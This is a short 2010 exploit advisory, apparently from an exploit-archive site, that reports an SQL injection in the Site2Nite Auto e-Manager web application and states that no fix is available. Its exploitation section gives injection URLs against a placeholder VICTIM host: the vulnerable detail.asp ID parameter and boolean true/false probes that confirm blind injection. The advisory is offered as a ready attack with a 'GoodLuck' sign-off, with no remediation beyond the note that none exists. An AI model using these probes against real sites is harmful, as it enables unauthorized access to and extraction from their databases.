Site2Nite Auto e-Manager SQL Injection Vulnerability

2010-10-11 09:15:41

==================================================
Auto e-Manager <= SQL Injection Vulnerability
==================================================

~~~~~~~~~~~~~~~[My]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
[+] Author : KnocKout
[~] Contact : [email protected]
[+] Greatz : h4x0reSEC / Inj3ct0r Team / Exploit-DB
{ H4X0RE SECURITY PROJECT }
~~~~~~~~~~~~~~~~[Software info]~~~~~~~~~~~~~~~~~~~~~~~~~~~~
~Web App. : Auto e-Manager
~Software: http://www.site2nite.com/
~Vulnerability Style : SQL Injection

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

~~~~~~~~ Explotation~~~~~~~~~~~

http://VICTIM/www/detail.asp?ID=654 {SQL Injection}
http://VICTIM/www/detail.asp?ID=654 and 1=1 {True}
http://VICTIM/www/detail.asp?ID=654 and 1=0 {False}

================================

GoodLuck.

Fixes

No fixes

Per poter inviare un fix è necessario essere utenti registrati.